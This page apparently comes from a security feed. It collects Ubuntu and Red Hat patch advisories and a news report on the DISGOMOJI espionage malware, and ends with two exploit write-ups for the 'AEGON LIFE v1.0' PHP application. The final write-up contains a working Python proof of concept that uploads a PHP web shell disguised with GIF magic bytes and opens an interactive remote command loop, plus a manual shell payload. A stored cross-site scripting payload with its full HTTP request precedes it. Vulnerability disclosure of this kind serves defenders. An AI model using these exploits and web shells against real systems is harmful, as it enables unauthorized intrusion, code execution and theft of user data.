Ubuntu Security Notice 6817-3 - Ziming Zhang discovered that the DRM driver for VMware Virtual GPU did not properly handle certain error conditions, leading to a NULL pointer dereference. A local attacker could possibly trigger this vulnerability to cause a denial of service. Zheng Wang discovered that the Broadcom FullMAC WLAN driver in the Linux kernel contained a race condition during device removal, leading to a use- after-free vulnerability. A physically proximate attacker could possibly use this to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6817-3June 14, 2024linux-azure, linux-gke vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-gke: Linux kernel for Google Container Engine (GKE) systemsDetails:Ziming Zhang discovered that the DRM driver for VMware Virtual GPU did notproperly handle certain error conditions, leading to a NULL pointerdereference. A local attacker could possibly trigger this vulnerability tocause a denial of service. (CVE-2022-38096)Zheng Wang discovered that the Broadcom FullMAC WLAN driver in the Linuxkernel contained a race condition during device removal, leading to a use-after-free vulnerability. A physically proximate attacker could possiblyuse this to cause a denial of service (system crash). (CVE-2023-47233)It was discovered that the ATA over Ethernet (AoE) driver in the Linuxkernel contained a race condition, leading to a use-after-freevulnerability. An attacker could use this to cause a denial of service orpossibly execute arbitrary code. (CVE-2023-6270)It was discovered that the Atheros 802.11ac wireless driver did notproperly validate certain data structures, leading to a NULL pointerdereference. An attacker could possibly use this to cause a denial ofservice. (CVE-2023-7042)Gui-Dong Han discovered that the software RAID driver in the Linux kernelcontained a race condition, leading to an integer overflow vulnerability. Aprivileged attacker could possibly use this to cause a denial of service(system crash). (CVE-2024-23307)Bai Jiaju discovered that the Xceive XC4000 silicon tuner device driver inthe Linux kernel contained a race condition, leading to an integer overflowvulnerability. An attacker could possibly use this to cause a denial ofservice (system crash). (CVE-2024-24861)Chenyuan Yang discovered that the Unsorted Block Images (UBI) flash devicevolume management subsystem did not properly validate logical eraseblocksizes in certain situations. An attacker could possibly use this to cause adenial of service (system crash). (CVE-2024-25739)It was discovered that the MediaTek SoC Gigabit Ethernet driver in theLinux kernel contained a race condition when stopping the device. A localattacker could possibly use this to cause a denial of service (deviceunavailability). (CVE-2024-27432)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - ARM32 architecture;   - PowerPC architecture;   - x86 architecture;   - Block layer subsystem;   - ACPI drivers;   - Bluetooth drivers;   - Clock framework and drivers;   - CPU frequency scaling framework;   - Cryptographic API;   - DPLL subsystem;   - ARM SCMI message protocol;   - EFI core;   - GPU drivers;   - InfiniBand drivers;   - IOMMU subsystem;   - LED subsystem;   - Multiple devices driver;   - Media drivers;   - MMC subsystem;   - Network drivers;   - NTB driver;   - NVME drivers;   - PCI subsystem;   - Powercap sysfs driver;   - SCSI drivers;   - Freescale SoC drivers;   - SPI subsystem;   - Media staging drivers;   - Thermal drivers;   - TTY drivers;   - USB subsystem;   - DesignWare USB3 driver;   - VFIO drivers;   - Backlight driver;   - Virtio drivers;   - Xen hypervisor drivers;   - AFS file system;   - File systems infrastructure;   - BTRFS file system;   - debug file system;   - Ext4 file system;   - F2FS file system;   - FAT file system;   - Network file system client;   - NILFS2 file system;   - Overlay file system;   - Pstore file system;   - Diskquota system;   - SMB network file system;   - UBI file system;   - io_uring subsystem;   - BPF subsystem;   - Core kernel;   - Memory management;   - Bluetooth subsystem;   - Networking core;   - HSR network protocol;   - IPv4 networking;   - IPv6 networking;   - MAC80211 subsystem;   - IEEE 802.15.4 subsystem;   - Netfilter;   - Packet sockets;   - Network traffic control;   - Sun RPC protocol;   - ALSA SH drivers;   - SOF drivers;   - USB sound devices;   - KVM core;(CVE-2024-26859, CVE-2024-26944, CVE-2024-27049, CVE-2024-26868,CVE-2024-26932, CVE-2024-35843, CVE-2024-35814, CVE-2024-26866,CVE-2024-26941, CVE-2024-27080, CVE-2024-26938, CVE-2024-26889,CVE-2024-27075, CVE-2024-27077, CVE-2024-26864, CVE-2024-35787,CVE-2024-27071, CVE-2024-26880, CVE-2024-26961, CVE-2024-26945,CVE-2024-26863, CVE-2024-35795, CVE-2024-27045, CVE-2024-27066,CVE-2024-27046, CVE-2024-26816, CVE-2024-27069, CVE-2024-26861,CVE-2024-26968, CVE-2024-26963, CVE-2024-26878, CVE-2024-27073,CVE-2024-35806, CVE-2024-26951, CVE-2024-26954, CVE-2024-27026,CVE-2024-26956, CVE-2024-35811, CVE-2024-35803, CVE-2024-26964,CVE-2024-26848, CVE-2024-27434, CVE-2024-35844, CVE-2024-26977,CVE-2024-27031, CVE-2024-35813, CVE-2024-26960, CVE-2024-27067,CVE-2024-26937, CVE-2024-26884, CVE-2024-26656, CVE-2024-27068,CVE-2024-26871, CVE-2023-52653, CVE-2024-26939, CVE-2024-26967,CVE-2024-26966, CVE-2024-27043, CVE-2024-26814, CVE-2024-35829,CVE-2024-26973, CVE-2024-35810, CVE-2024-26877, CVE-2024-27392,CVE-2024-35805, CVE-2024-26875, CVE-2024-26970, CVE-2024-26657,CVE-2024-26874, CVE-2024-26971, CVE-2024-26872, CVE-2024-35798,CVE-2024-26931, CVE-2024-26948, CVE-2024-26883, CVE-2024-26955,CVE-2024-27039, CVE-2024-27038, CVE-2024-27065, CVE-2024-26899,CVE-2024-27048, CVE-2024-35874, CVE-2024-35845, CVE-2024-35799,CVE-2024-35827, CVE-2024-26935, CVE-2024-27079, CVE-2024-35821,CVE-2024-26950, CVE-2024-26879, CVE-2024-26940, CVE-2024-35788,CVE-2024-26891, CVE-2024-27063, CVE-2024-27433, CVE-2024-27036,CVE-2024-35819, CVE-2024-26969, CVE-2024-27044, CVE-2024-27028,CVE-2024-27070, CVE-2023-52649, CVE-2024-27435, CVE-2024-35830,CVE-2024-26929, CVE-2024-26653, CVE-2024-26887, CVE-2024-26869,CVE-2024-26942, CVE-2024-35822, CVE-2024-26979, CVE-2024-26881,CVE-2024-26655, CVE-2024-26975, CVE-2023-52650, CVE-2024-26651,CVE-2024-35828, CVE-2024-26965, CVE-2024-27437, CVE-2024-35794,CVE-2024-26962, CVE-2024-27058, CVE-2024-27076, CVE-2024-27035,CVE-2024-27074, CVE-2024-27027, CVE-2024-26860, CVE-2024-27042,CVE-2024-27390, CVE-2024-26815, CVE-2023-52662, CVE-2024-27051,CVE-2024-35796, CVE-2024-27047, CVE-2024-26930, CVE-2024-26865,CVE-2024-27064, CVE-2024-35826, CVE-2024-26885, CVE-2024-26873,CVE-2024-26943, CVE-2024-26893, CVE-2024-27030, CVE-2024-26976,CVE-2024-35793, CVE-2024-26952, CVE-2023-52644, CVE-2024-35797,CVE-2024-27029, CVE-2024-26927, CVE-2024-26812, CVE-2024-27432,CVE-2024-26897, CVE-2024-26890, CVE-2024-26972, CVE-2024-35800,CVE-2024-27032, CVE-2024-27052, CVE-2023-52647, CVE-2024-26898,CVE-2023-52652, CVE-2024-35808, CVE-2024-26876, CVE-2024-26933,CVE-2024-26862, CVE-2024-27033, CVE-2023-52663, CVE-2024-27041,CVE-2023-52648, CVE-2024-26888, CVE-2024-26957, CVE-2024-26953,CVE-2023-52659, CVE-2024-27436, CVE-2024-27040, CVE-2024-27054,CVE-2024-27050, CVE-2024-26886, CVE-2023-52661, CVE-2024-35831,CVE-2024-26946, CVE-2024-26949, CVE-2024-26809, CVE-2024-26892,CVE-2024-26654, CVE-2024-26901, CVE-2024-27053, CVE-2024-26882,CVE-2024-35809, CVE-2024-26978, CVE-2024-27037, CVE-2024-27391,CVE-2024-27034, CVE-2024-26895, CVE-2024-35817, CVE-2024-26900,CVE-2024-26896, CVE-2024-26958, CVE-2024-35801, CVE-2024-27388,CVE-2024-26934, CVE-2024-27078, CVE-2024-35789, CVE-2024-26894,CVE-2024-27389, CVE-2024-35807, CVE-2024-27072, CVE-2024-26947,CVE-2024-26870, CVE-2024-26813, CVE-2022-48669, CVE-2024-26959,CVE-2024-26810)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS   linux-image-6.8.0-1004-gke      6.8.0-1004.7   linux-image-6.8.0-1008-azure    6.8.0-1008.8   linux-image-6.8.0-1008-azure-fde  6.8.0-1008.8   linux-image-azure               6.8.0-1008.8   linux-image-azure-fde           6.8.0-1008.8   linux-image-gke                 6.8.0-1004.7After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6817-3   https://ubuntu.com/security/notices/USN-6817-1   CVE-2022-38096, CVE-2022-48669, CVE-2023-47233, CVE-2023-52644,   CVE-2023-52647, CVE-2023-52648, CVE-2023-52649, CVE-2023-52650,   CVE-2023-52652, CVE-2023-52653, CVE-2023-52659, CVE-2023-52661,   CVE-2023-52662, CVE-2023-52663, CVE-2023-6270, CVE-2023-7042,   CVE-2024-23307, CVE-2024-24861, CVE-2024-25739, CVE-2024-26651,   CVE-2024-26653, CVE-2024-26654, CVE-2024-26655, CVE-2024-26656,   CVE-2024-26657, CVE-2024-26809, CVE-2024-26810, CVE-2024-26812,   CVE-2024-26813, CVE-2024-26814, CVE-2024-26815, CVE-2024-26816,   CVE-2024-26848, CVE-2024-26859, CVE-2024-26860, CVE-2024-26861,   CVE-2024-26862, CVE-2024-26863, CVE-2024-26864, CVE-2024-26865,   CVE-2024-26866, CVE-2024-26868, CVE-2024-26869, CVE-2024-26870,   CVE-2024-26871, CVE-2024-26872, CVE-2024-26873, CVE-2024-26874,   CVE-2024-26875, CVE-2024-26876, CVE-2024-26877, CVE-2024-26878,   CVE-2024-26879, CVE-2024-26880, CVE-2024-26881, CVE-2024-26882,   CVE-2024-26883, CVE-2024-26884, CVE-2024-26885, CVE-2024-26886,   CVE-2024-26887, CVE-2024-26888, CVE-2024-26889, CVE-2024-26890,   CVE-2024-26891, CVE-2024-26892, CVE-2024-26893, CVE-2024-26894,   CVE-2024-26895, CVE-2024-26896, CVE-2024-26897, CVE-2024-26898,   CVE-2024-26899, CVE-2024-26900, CVE-2024-26901, CVE-2024-26927,   CVE-2024-26929, CVE-2024-26930, CVE-2024-26931, CVE-2024-26932,   CVE-2024-26933, CVE-2024-26934, CVE-2024-26935, CVE-2024-26937,   CVE-2024-26938, CVE-2024-26939, CVE-2024-26940, CVE-2024-26941,   CVE-2024-26942, CVE-2024-26943, CVE-2024-26944, CVE-2024-26945,   CVE-2024-26946, CVE-2024-26947, CVE-2024-26948, CVE-2024-26949,   CVE-2024-26950, CVE-2024-26951, CVE-2024-26952, CVE-2024-26953,   CVE-2024-26954, CVE-2024-26955, CVE-2024-26956, CVE-2024-26957,   CVE-2024-26958, CVE-2024-26959, CVE-2024-26960, CVE-2024-26961,   CVE-2024-26962, CVE-2024-26963, CVE-2024-26964, CVE-2024-26965,   CVE-2024-26966, CVE-2024-26967, CVE-2024-26968, CVE-2024-26969,   CVE-2024-26970, CVE-2024-26971, CVE-2024-26972, CVE-2024-26973,   CVE-2024-26975, CVE-2024-26976, CVE-2024-26977, CVE-2024-26978,   CVE-2024-26979, CVE-2024-27026, CVE-2024-27027, CVE-2024-27028,   CVE-2024-27029, CVE-2024-27030, CVE-2024-27031, CVE-2024-27032,   CVE-2024-27033, CVE-2024-27034, CVE-2024-27035, CVE-2024-27036,   CVE-2024-27037, CVE-2024-27038, CVE-2024-27039, CVE-2024-27040,   CVE-2024-27041, CVE-2024-27042, CVE-2024-27043, CVE-2024-27044,   CVE-2024-27045, CVE-2024-27046, CVE-2024-27047, CVE-2024-27048,   CVE-2024-27049, CVE-2024-27050, CVE-2024-27051, CVE-2024-27052,   CVE-2024-27053, CVE-2024-27054, CVE-2024-27058, CVE-2024-27063,   CVE-2024-27064, CVE-2024-27065, CVE-2024-27066, CVE-2024-27067,   CVE-2024-27068, CVE-2024-27069, CVE-2024-27070, CVE-2024-27071,   CVE-2024-27072, CVE-2024-27073, CVE-2024-27074, CVE-2024-27075,   CVE-2024-27076, CVE-2024-27077, CVE-2024-27078, CVE-2024-27079,   CVE-2024-27080, CVE-2024-27388, CVE-2024-27389, CVE-2024-27390,   CVE-2024-27391, CVE-2024-27392, CVE-2024-27432, CVE-2024-27433,   CVE-2024-27434, CVE-2024-27435, CVE-2024-27436, CVE-2024-27437,   CVE-2024-35787, CVE-2024-35788, CVE-2024-35789, CVE-2024-35793,   CVE-2024-35794, CVE-2024-35795, CVE-2024-35796, CVE-2024-35797,   CVE-2024-35798, CVE-2024-35799, CVE-2024-35800, CVE-2024-35801,   CVE-2024-35803, CVE-2024-35805, CVE-2024-35806, CVE-2024-35807,   CVE-2024-35808, CVE-2024-35809, CVE-2024-35810, CVE-2024-35811,   CVE-2024-35813, CVE-2024-35814, CVE-2024-35817, CVE-2024-35819,   CVE-2024-35821, CVE-2024-35822, CVE-2024-35826, CVE-2024-35827,   CVE-2024-35828, CVE-2024-35829, CVE-2024-35830, CVE-2024-35831,   CVE-2024-35843, CVE-2024-35844, CVE-2024-35845, CVE-2024-35874Package Information:   https://launchpad.net/ubuntu/+source/linux-azure/6.8.0-1008.8   https://launchpad.net/ubuntu/+source/linux-gke/6.8.0-1004.7

Ubuntu Security Notice USN-6817-3

Red Hat Security Advisory 2024-3939-03 - An update for linux-firmware is now available for Red Hat Enterprise Linux 7.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3939.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: linux-firmware security update  
Advisory ID:        RHSA-2024:3939-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:3939  
Issue date:         2024-06-17  
Revision:           03  
CVE Names:          CVE-2022-27635  
====================================================================

Summary: 

An update for linux-firmware is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The linux-firmware packages contain all of the firmware files that are required by various devices to operate.

Security Fix(es):

* hw: intel: Protection mechanism failure for some Intel(R) PROSet/Wireless WiFi (CVE-2022-46329)

* hw: intel: Improper access control for some Intel(R) PROSet/Wireless WiFi (CVE-2022-27635)

* hw: intel: Improper access control for some Intel(R) PROSet/Wireless WiFi (CVE-2022-40964)

* hw: intel: Improper input validation in some Intel(R) PROSet/Wireless WiFi (CVE-2022-36351)

* hw: intel: Improper input validation in some Intel(R) PROSet/Wireless WiFi (CVE-2022-38076)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-27635

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2238960  
https://bugzilla.redhat.com/show_bug.cgi?id=2238961  
https://bugzilla.redhat.com/show_bug.cgi?id=2238962  
https://bugzilla.redhat.com/show_bug.cgi?id=2238963  
https://bugzilla.redhat.com/show_bug.cgi?id=2238964

Red Hat Security Advisory 2024-3939-03

A suspected Pakistan-based threat actor has been linked to a cyber espionage campaign targeting Indian government entities in 2024.
Cybersecurity company Volexity is tracking the activity under the moniker UTA0137, noting the adversary's exclusive use of a malware called DISGOMOJI that's written in Golang and is designed to infect Linux systems.
"It is a modified version of the public project

Cyber Espionage / Malware

A suspected Pakistan-based threat actor has been linked to a cyber espionage campaign targeting Indian government entities in 2024.

Cybersecurity company Volexity is tracking the activity under the moniker UTA0137, noting the adversary's exclusive use of a malware called DISGOMOJI that's written in Golang and is designed to infect Linux systems.

"It is a modified version of the public project Discord-C2, which uses the messaging service Discord for command and control (C2), making use of emojis for its C2 communication," it said.

It's worth noting that DISGOMOJI is the same "all-in-one" espionage tool that BlackBerry said it discovered as part of an infrastructure analysis in connection with an attack campaign mounted by the Transparent Tribe actor, a Pakistan-nexus hacking crew

The attack chains commence with spear-phishing emails bearing a Golang ELF binary delivered within a ZIP archive file. The binary then downloads a benign lure document while also stealthily downloading the DISGOMOJI payload from a remote server.

A custom-fork of Discord-C2, DISGOMOJI is designed to capture host information and run commands received from an attacker-controlled Discord server. In an interesting twist, the commands are sent in the form of different emojis -

*   🏃‍♂️ - Execute a command on the victim's device
*   📸 - Capture a screenshot of the victim's screen
*   👇 - Upload a file from the victim's device to the channel
*   👈 - Upload a file from the victim's device to transfer\[.\]sh
*   ☝️ - Download a file to the victim's device
*   👉 - Download a file hosted on oshi\[.\]at to the victim's device
*   🔥 - Find and exfiltrate files matching the following extensions: CSV, DOC, ISO, JPG, ODP, ODS, ODT, PDF, PPT, RAR, SQL, TAR, XLS, and ZIP
*   🦊 - Gather all Mozilla Firefox profiles on the victim's device into a ZIP archive
*   💀 - Terminate the malware process on the victim's device

"The malware creates a dedicated channel for itself in the Discord server, meaning each channel in the server represents an individual victim," Volexity said. "The attacker can then interact with every victim individually using these channels."

The company said it unearthed different variations of DISGOMOJI with capabilities to establish persistence, prevent duplicate DISGOMOJI processes from running at the same time, dynamically fetch the credentials to connect to the Discord server at runtime rather than hard coding them, and deter analysis by displaying bogus informational and error messages.

UTA0137 has also been observed using legitimate and open-source tools like Nmap, Chisel, and Ligolo for network scanning and tunneling purposes, respectively, with one recent campaign also exploiting the DirtyPipe flaw (CVE-2022-0847) to achieve privilege escalation against Linux hosts.

Another post-exploitation tactic concerns the use of the Zenity utility to display a malicious dialog box that masquerades as a Firefox update in order to socially engineer users into giving up their passwords.

"The attacker successfully managed to infect a number of victims with their Golang malware, DISGOMOJI," Volexity said. "UTA0137 has improved DISGOMOJI over time."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Pakistani Hackers Use DISGOMOJI Malware in Indian Government Cyber Attacks

Red Hat Security Advisory 2024-3929-03 - An update for dnsmasq is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3929.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: dnsmasq security updateAdvisory ID:        RHSA-2024:3929-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3929Issue date:         2024-06-13Revision:           03CVE Names:          CVE-2023-50387====================================================================Summary: An update for dnsmasq is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The dnsmasq packages contain Dnsmasq, a lightweight DNS (Domain Name Server) forwarder and DHCP (Dynamic Host Configuration Protocol) server.Security Fix(es):* bind9: KeyTrap - Extreme CPU consumption in DNSSEC validator (CVE-2023-50387)* bind9: Preparing an NSEC3 closest encloser proof can exhaust CPU resources (CVE-2023-50868)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-50387References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263914https://bugzilla.redhat.com/show_bug.cgi?id=2263917

Red Hat Security Advisory 2024-3929-03

Red Hat Security Advisory 2024-3927-03 - A new container image for Red Hat Ceph Storage 7.1 is now available in the Red Hat Ecosystem Catalog.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3927.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: Red Hat Ceph Storage 7.1 container image security, and bug fix update  
Advisory ID:        RHSA-2024:3927-03  
Product:            Red Hat Ceph Storage  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:3927  
Issue date:         2024-06-13  
Revision:           03  
CVE Names:          CVE-2023-39325  
====================================================================

Summary: 

A new container image for Red Hat Ceph Storage 7.1 is now available in the  
Red Hat Ecosystem Catalog.

Description:

Red Hat Ceph Storage is a scalable, open, software-defined storage platform that combines the most stable version of the Ceph storage system with a Ceph management platform, deployment utilities, and support services.

This new container image is based on Red Hat Ceph Storage 7.0 and Red Hat Enterprise Linux 9.2.

Space precludes documenting all of these changes in this advisory. Users are directed to the Red Hat Ceph Storage Release Notes for information on the most significant of these changes:

https://access.redhat.com/documentation/en-us/red_hat_ceph_storage/7.1/html/release_notes/index

All users of Red Hat Ceph Storage are advised to pull these new images from  
the Red Hat Ecosystem catalog, which provides numerous enhancements and bug  
fixes.

Solution:

https://access.redhat.com/documentation/en-us/red_hat_ceph_storage/7

https://access.redhat.com/articles/1548993

CVEs:

CVE-2023-39325

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/security/cve/CVE-2023-39325  
https://access.redhat.com/security/cve/CVE-2024-22195  
https://bugzilla.redhat.com/show_bug.cgi?id=2243296  
https://bugzilla.redhat.com/show_bug.cgi?id=2257854  
https://bugzilla.redhat.com/show_bug.cgi?id=2268114

Red Hat Security Advisory 2024-3927-03

Red Hat Security Advisory 2024-3926-03 - An update for expat is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3926.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: expat security updateAdvisory ID:        RHSA-2024:3926-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3926Issue date:         2024-06-13Revision:           03CVE Names:          CVE-2023-52425====================================================================Summary: An update for expat is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Expat is a C library for parsing XML documents.Security Fix(es):* expat: parsing large tokens can trigger a denial of service (CVE-2023-52425)* expat: XML Entity Expansion (CVE-2024-28757)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-52425References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2262877https://bugzilla.redhat.com/show_bug.cgi?id=2268766

Red Hat Security Advisory 2024-3926-03

AEGON LIFE version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title:  Life Insurance Management Stored System- cross-site scripting (XSS)# Exploit Author: Aslam Anwar Mahimkar# Date: 18-05-2024# Category: Web application# Vendor Homepage: https://projectworlds.in/# Software Link: https://projectworlds.in/life-insurance-management-system-in-php/# Version: AEGON LIFE v1.0# Tested on: Linux# CVE: CVE-2024-36599# Description:----------------A stored cross-site scripting (XSS) vulnerability in Aegon Life v1.0 allows attackers to execute arbitrary web scripts via a crafted payload injected into the name parameter at insertClient.php.# Payload:----------------<script>alert(document.domain)</script># Attack Vectors:-------------------------To exploit this vulnerability use <script>alert(document.domain)</script> when user visit Client.php we can see the XSS.# Burp Suite Request:----------------------------POST /lims/insertClient.php HTTP/1.1Host: localhostContent-Length: 30423Cache-Control: max-age=0sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundarymKfAe0x95923LzQHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/lims/addClient.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=v6g7shnk1mm5vq6i63lklck78nConnection: close------WebKitFormBoundarymKfAe0x95923LzQHContent-Disposition: form-data; name="client_id"1716051159------WebKitFormBoundarymKfAe0x95923LzQHContent-Disposition: form-data; name="client_password"password------WebKitFormBoundarymKfAe0x95923LzQHContent-Disposition: form-data; name="name"<script>alert(document.domain)</script>------WebKitFormBoundarymKfAe0x95923LzQHContent-Disposition: form-data; name="fileToUpload"; filename="runme.jpg_original"Content-Type: application/octet-streamÿØÿà

AEGON LIFE 1.0 Cross Site Scripting

AEGON LIFE version 1.0 suffers from an unauthenticated remote code execution vulnerability.

# Exploit Title:  Life Insurance Management System- Unauthenticated Remote Code Execution (RCE)  
# Exploit Author: Aslam Anwar Mahimkar  
# Date: 18-05-2024  
# Category: Web application  
# Vendor Homepage: https://projectworlds.in/  
# Software Link: https://projectworlds.in/life-insurance-management-system-in-php/  
# Version: AEGON LIFE v1.0  
# Tested on: Linux  
# CVE: CVE-2024-36598

# Description:  
----------------

-An arbitrary file upload vulnerability in Aegon Life v1.0 allows attackers to execute arbitrary code via uploading a crafted PHP file by adding image/gif magic bytes in payload.

-In insertClient.php fileToUpload is only checking for image file but not checking for extensions, also header.php is not properly handling the redirection hence allowing Unauthenticated redirect.

# Payload:  
------------------

payload = "GIF89a;'<?php echo shell_exec($_GET[\'cmd\']); ?>'"

# RCE via executing exploit:  
---------------------------------------

    # Step : run the exploit in python with this command: python3 shell.py  http://localhost/lims/  
    # will lead to RCE shell.

  POC  
-------------------

import argparse  
import random  
import requests  
import string  
import sys

parser = argparse.ArgumentParser()  
parser.add_argument('url', action='store', help='The URL of the target.')  
args = parser.parse_args()

url = args.url.rstrip('/')  
random_file = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(10))

payload = "GIF89a;'<?php echo shell_exec($_GET[\'cmd\']); ?>'"

file = {'fileToUpload': (random_file + '.php', payload, 'text/php')}  
print('> Attempting to upload PHP web shell...')  
r = requests.post(url + '/insertClient.php', files=file, data={'agent_id':''}, verify=False)  
print('> Verifying shell upload...')  
r = requests.get(url + '/uploads/' + random_file + '.php', params={'cmd':'echo ' + random_file}, verify=False)

if random_file in r.text:  
    print('> Web shell uploaded to ' + url + '/uploads/' + random_file + '.php')  
    print('> Example command usage: ' + url + '/uploads/' + random_file + '.php?cmd=whoami')  
    launch_shell = str(input('> Do you wish to launch a shell here? (y/n): '))  
    if launch_shell.lower() == 'y':  
        while True:  
            cmd = str(input('RCE $ '))  
            if cmd == 'exit':  
                sys.exit(0)  
            r = requests.get(url + '/uploads/' + random_file + '.php', params={'cmd':cmd}, verify=False)  
            print(r.text)  
else:  
    if r.status_code == 200:  
        print('> Web shell uploaded to ' + url + '/uploads/' + random_file + '.php, however a simple command check failed to execute. Perhaps shell_exec is disabled? Try changing the payload.')  
    else:  
        print('> Web shell failed to upload! The web server may not have write permissions.')

---------------------------------------------------------------------------------------------------------------------------

### Can also performed manually.

Payload:  
--------------

GIF89a;  
<?php  
echo"<pre>";  
passthru($_GET['cmd']);  
echo"<pre>";  
?>

# Attack Vectors:  
-------------------------

After uploading malicious image can access it to get the shell

http://localhost/lims/uploads/shell2.gif.php?cmd=id

Burp Suit Request  
-----------------------------

POST /lims/insertClient.php HTTP/1.1  
Host: localhost  
Content-Length: 2197  
Cache-Control: max-age=0  
sec-ch-ua:   
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: ""  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5plGALZGPOOdBlF0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/lims/addClient.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="client_id"

1716015032

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="client_password"

Password

